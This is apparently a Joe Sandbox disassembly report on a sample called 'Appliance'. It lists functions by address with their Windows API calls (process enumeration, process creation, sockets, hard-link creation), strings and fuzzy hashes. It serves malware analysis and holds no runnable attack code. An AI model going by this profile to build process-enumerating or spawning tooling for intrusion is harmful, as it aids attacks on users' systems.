Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 89dfc272e7d9f1266107a0d70a573d24d390e95065a5d51b23d325f6120161a0
Instruction ID: e9594611d7cbb4cc6e960caeba974080509ce434c43a0cc4fabb72fc1cfd51f9
Opcode Fuzzy Hash: 89dfc272e7d9f1266107a0d70a573d24d390e95065a5d51b23d325f6120161a0
Instruction Fuzzy Hash: 0921D372604218BBDF118F90CC84FAB376EEF89759F009515FE04AB1E0C6719C868BA0

Function 00E35439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E3544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E354A1
SetErrorMode.KERNEL32(00000000,?,?,00E5DCD0), ref: 00E35515

Strings

%lu, xrefs: 00E354B4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: d892c42726679df5b29273fa70bd70dae6afbaa23b4f26f3a62a2ed4310010e2
Instruction ID: 51a7ddaae31825edd78bc9b5191c0faf488ed0f470c70db96b34d547fccc1f9b
Opcode Fuzzy Hash: d892c42726679df5b29273fa70bd70dae6afbaa23b4f26f3a62a2ed4310010e2
Instruction Fuzzy Hash: 73314F71A00209AFDB10DF54C985EAABBF8EF04309F144099E509EB362DB71EE45CB61

Function 00E58305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00E58339
EnumChildWindows.USER32(?,00E5802F,00000000), ref: 00E583B0

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

Strings

(, xrefs: 00E58317
(, xrefs: 00E5834A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: ($(
API String ID: 3814560230-3881858432
Opcode ID: 282190ff6b68a5d421e1bb78f412b62e780210b54ad5f25aa26d78b9a619539e
Instruction ID: 91b4dde90be82c3bb7fdbab6962b5f3c427d55552b9c8cda1217655869253d9f
Opcode Fuzzy Hash: 282190ff6b68a5d421e1bb78f412b62e780210b54ad5f25aa26d78b9a619539e
Instruction Fuzzy Hash: DE215E74105301DFCB24DF29D850AA6B7F5FB89761F201A1EE975B73A0DB70A809CB60

Function 00E54C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E54CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E54D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E54D0F

Strings

msctls_trackbar32, xrefs: 00E54CC4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 689452032d38df9cb82183cdc70f72ac9da9c0759c32f6483a2f7ff9fe9c74fb
Instruction ID: 99f16eeb8ef41109ab864b8e5c2ea1c350047a0fdd89caf41a127e930f662952
Opcode Fuzzy Hash: 689452032d38df9cb82183cdc70f72ac9da9c0759c32f6483a2f7ff9fe9c74fb
Instruction Fuzzy Hash: 4D1123B1240248BEEF205E65CC06FAB77A8EF84B29F111915FE44F20E0C271D8909B20

Function 00E2389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

Part of subcall function 00E236F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E23712
Part of subcall function 00E236F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E23723
Part of subcall function 00E236F4: GetCurrentThreadId.KERNEL32 ref: 00E2372A
Part of subcall function 00E236F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E23731

GetFocus.USER32 ref: 00E238C4

Part of subcall function 00E2373B: GetParent.USER32(00000000), ref: 00E23746

GetClassNameW.USER32(?,?,00000100), ref: 00E2390F
EnumChildWindows.USER32(?,00E23987), ref: 00E23937

Strings

%s%d, xrefs: 00E2394B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 5774c05e0c040503547baeddf53325ed579d596c8a1aa9a0207caea4f47c6369
Instruction ID: 7fc7c2584c0d2c2d7822677709b335afe104b6a43cd63dd4f1dcdb2a91155dcf
Opcode Fuzzy Hash: 5774c05e0c040503547baeddf53325ed579d596c8a1aa9a0207caea4f47c6369
Instruction Fuzzy Hash: 361105B17002196BCF11BF709C85EED77A9AF84304F005069B809BB292CEB4494A9F30

Function 00DC59FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00DC5A34
DestroyWindow.USER32(?,00DC37B8,?,?,?,?,?,00DC3709,?,?), ref: 00DC5A91

Strings

<), xrefs: 00E04F34
<), xrefs: 00DC5A09

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)$<)
API String ID: 2587070983-10615988
Opcode ID: 704eccc6570ba4c0c21cf64ad8d0527420edbc0632b7ae82cda58a96976a943b
Instruction ID: 4f9e1bd8622d731e06df69f88a657a4d030e5f00d324262c6ebeec87aeebb7fc
Opcode Fuzzy Hash: 704eccc6570ba4c0c21cf64ad8d0527420edbc0632b7ae82cda58a96976a943b
Instruction Fuzzy Hash: 8921E774606A02AFDF189B16E894F2533E4ABD4315F04515FEA02FB2A5CB31AC88CB21

Function 00E56321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E56360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E5638D
DrawMenuBar.USER32(?), ref: 00E5639C

Strings

0, xrefs: 00E5632E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 1b46c1db1564d9bc34bafcffe152dd7c9943ca60d763865b73420c4b4422b7c6
Instruction ID: d2b6f97cc3bfd156b9ce729c8652cc80de28185d276daa1bf290ddebf34d88c7
Opcode Fuzzy Hash: 1b46c1db1564d9bc34bafcffe152dd7c9943ca60d763865b73420c4b4422b7c6
Instruction Fuzzy Hash: ED016D32504218EFDB21AF12DC84BAE7BB4FB45356F148499E849EA150DB708A89EF31

Function 00E5823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00E928E0,00E5AD55,000000FC,?,00000000,00000000,?), ref: 00E5823F
GetFocus.USER32 ref: 00E58247

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E582B4

Strings

(, xrefs: 00E58254

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (
API String ID: 3601265619-2063206799
Opcode ID: 906f05dce0130707c00311f460543c970abc61313d23ed977e59a8fdcd8ae71b
Instruction ID: 3ea9257e72971aaeb5cc00109d7f217d5fddbd858015e935af99da31ba13ee78
Opcode Fuzzy Hash: 906f05dce0130707c00311f460543c970abc61313d23ed977e59a8fdcd8ae71b
Instruction Fuzzy Hash: FF01B535206500DFC729DF29D844A6937EAEBC9326F14055EE912A73B0CB306C0FCB50

Function 00E58526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00E58576
CreateAcceleratorTableW.USER32(00000000,?,?,?,00E3BE96,00000000,00000000,?,00000001,00000002), ref: 00E5858C
GetForegroundWindow.USER32(?,00E3BE96,00000000,00000000,?,00000001,00000002), ref: 00E58595

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

Strings

(, xrefs: 00E58532

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (
API String ID: 986409557-2063206799
Opcode ID: 6cd35d65456bde658ec9c489b68f7c9242b1cd591d8012e15e1ef3342aca94ad
Instruction ID: 923b8a4b136ab264b7f7b7a1aeb9c496e44c8b811fa36c5b71bf408d9e452b63
Opcode Fuzzy Hash: 6cd35d65456bde658ec9c489b68f7c9242b1cd591d8012e15e1ef3342aca94ad
Instruction Fuzzy Hash: B7012130501314DFCF289F56DC84A6577A5FB54316F10591FEA11B72B0E7309998CF80

Function 00E58BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E94038,00E9407C), ref: 00E58C1A
CloseHandle.KERNEL32 ref: 00E58C2C

Strings

|@, xrefs: 00E58BE5
8@, xrefs: 00E58BD6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@$|@
API String ID: 3712363035-2203533388
Opcode ID: af52abccfed198e55bca6ec2895c1a1900eb1baef52f9672efd4d2d1f0b555a9
Instruction ID: 28d036fe18de3d6114b0ffafa55f4bc53862c34371b41581f53cd28568dc460c
Opcode Fuzzy Hash: af52abccfed198e55bca6ec2895c1a1900eb1baef52f9672efd4d2d1f0b555a9
Instruction Fuzzy Hash: 49F05EF2541304BEE7206B62AC46F773E5CEB14355F000422BF09F61E1D6754C0982BA

Function 00E2096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f04b22824c65f61e95bdea19c0faea270f83ced5eb616bc100d5e0a71dc136
Instruction ID: bb442671810824d51f6ab3b8e65cfe0ac746e949df6aac42d0cfc4076476a643
Opcode Fuzzy Hash: 22f04b22824c65f61e95bdea19c0faea270f83ced5eb616bc100d5e0a71dc136
Instruction Fuzzy Hash: 48C18275A00216EFDB14CF94D894EAEB7B5FF48708F109598E406EB292D771DE81CB90

Function 00DF41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00DF427E
__alldvrm.LIBCMT ref: 00DF447F
__alldvrm.LIBCMT ref: 00DF44A1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: a20a9d60eeeced40f9617ddc6daca7e7aaf22087d6f5f8d01fdca694e5433ca4
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 3AA1577290038A9FDB25CF18C8917BFBBE4EF55314F1A81ADE795AB281C2789941C770

Function 00E20D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20EF8
CLSIDFromProgID.OLE32(?,?,00000000,00E5DCE0,000000FF,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20F1D
_memcmp.LIBVCRUNTIME ref: 00E20F3E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 51bb19fa20add18dd992c09f611f72f0120bac7893ebbe235c040c8e48070e60
Instruction ID: d1fbb8abf1ebc8b4640ce661163ab44eed5223bc425554239beeae459c63c1a9
Opcode Fuzzy Hash: 51bb19fa20add18dd992c09f611f72f0120bac7893ebbe235c040c8e48070e60
Instruction Fuzzy Hash: 4A813871A00219EFCB04DF94C984EEEB7B9FF89315F204558E506BB291DB71AE46CB60

Function 00E4B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E4B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00E4B11A

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Process32NextW.KERNEL32(00000000,?), ref: 00E4B1FC
CloseHandle.KERNEL32(00000000), ref: 00E4B20B

Part of subcall function 00DDE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E04D73,?), ref: 00DDE395

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 3bfc0034aa925cd9fa52b76d5905d1e576f1ef0e521d994d2051322934e4d1b1
Instruction ID: 49204bc677ca96ff9bbdfa904e60190be74af477edf8d9a00678df28099837af
Opcode Fuzzy Hash: 3bfc0034aa925cd9fa52b76d5905d1e576f1ef0e521d994d2051322934e4d1b1
Instruction Fuzzy Hash: DE513CB1908301AFD310EF25D886E5BBBE8FF88754F40491DF589A7251EB70D905CBA2

Function 00E01711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E01840

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d51812d43126a06cc6b8b921db9450bb228d5da436b7ece991c1ff4a97b366c6
Instruction ID: 5b94dbf6a69f734f973c9c93ec42f74573801f83549649aa075fe7d6595e5bed
Opcode Fuzzy Hash: d51812d43126a06cc6b8b921db9450bb228d5da436b7ece991c1ff4a97b366c6
Instruction Fuzzy Hash: 9B412D31900144ABDB397BBA9C41BBE36A4EF46730F1886AAF514FF1D1E63549C14671

Function 00E42533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00E4255A
WSAGetLastError.WSOCK32 ref: 00E42568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E425E7
WSAGetLastError.WSOCK32 ref: 00E425F1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 3b37a629fc9dc6ce94b848499e784f103780cb719cf4c0211f04d99c1c6ed551
Instruction ID: b82b29780b1578b71e16a769b12df13d33f009ab5e0c20a2e50dcd439b640dcd
Opcode Fuzzy Hash: 3b37a629fc9dc6ce94b848499e784f103780cb719cf4c0211f04d99c1c6ed551
Instruction Fuzzy Hash: 8C41B375A00201AFE720AF24D886F2677E5EB44718F94C48CFA599F3D2D772ED418BA1

Function 00E56CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E56D1A
ScreenToClient.USER32(?,?), ref: 00E56D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E56DBA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: a8c1a2b14e732be1468b880fa5f6a10113a48859382ea7b17a01bfe6b5121098
Instruction ID: ceb5eb310345e2f551b2e1d93a263822e1f7a05d0db462579944c4b921c3438f
Opcode Fuzzy Hash: a8c1a2b14e732be1468b880fa5f6a10113a48859382ea7b17a01bfe6b5121098
Instruction Fuzzy Hash: 5F516034A01209EFCF24DF64D881AAE7BB6FF44325F50995AFD15A7290DB30AE45CB50

Function 00DFB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d0e312e6f7811eecaa61d5633a1486c00bfc9c64631dcc1b497c4f2e1be5c9c
Instruction ID: 56cbdac565687cd0c7574ce30c4066920943e0efe7b3c176568f55510d045369
Opcode Fuzzy Hash: 8d0e312e6f7811eecaa61d5633a1486c00bfc9c64631dcc1b497c4f2e1be5c9c
Instruction Fuzzy Hash: AD41E371A00708BFD724AF78D841BBABBE8EB88760F11C52EE251DB291D771994187A0

Function 00E3611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E361C8
